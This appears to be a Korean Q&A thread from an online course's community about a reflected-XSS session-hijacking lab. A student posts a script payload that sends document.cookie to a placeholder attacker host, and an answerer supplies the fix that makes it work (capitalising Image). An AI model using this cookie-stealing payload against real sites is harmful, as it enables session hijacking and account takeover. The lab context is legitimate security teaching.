&lt;script&gt;new image().src='<a target="_blank" rel="noopener noreferrer nofollow" href="http://제아이피/xss_attack/session.php?data='+document.cookie</script>">http://제아이피/xss_attack/session.php?data='+document.cookie&lt;/script&gt;</a>location.href 스크립트는 성공했는데했는데 new image().src는 세션값이 안넘어 옵니다...혹시 자바1.8.0버전과 관련있을까요??

앗.. 저도 이거 해결못해서 3일이나 보다가 찾았.. 습니다. &nbsp;

안녕하세요.자바스크립트는 자바와 무관합니다.ㅎimage() 에서 i를 대문자 I로 변경해서 해보세요.

인프런 커뮤니티 질문&답변

[실습6-3] REFLECTED XSS를 통한 세션 하이재킹 공격 실습 공격 실패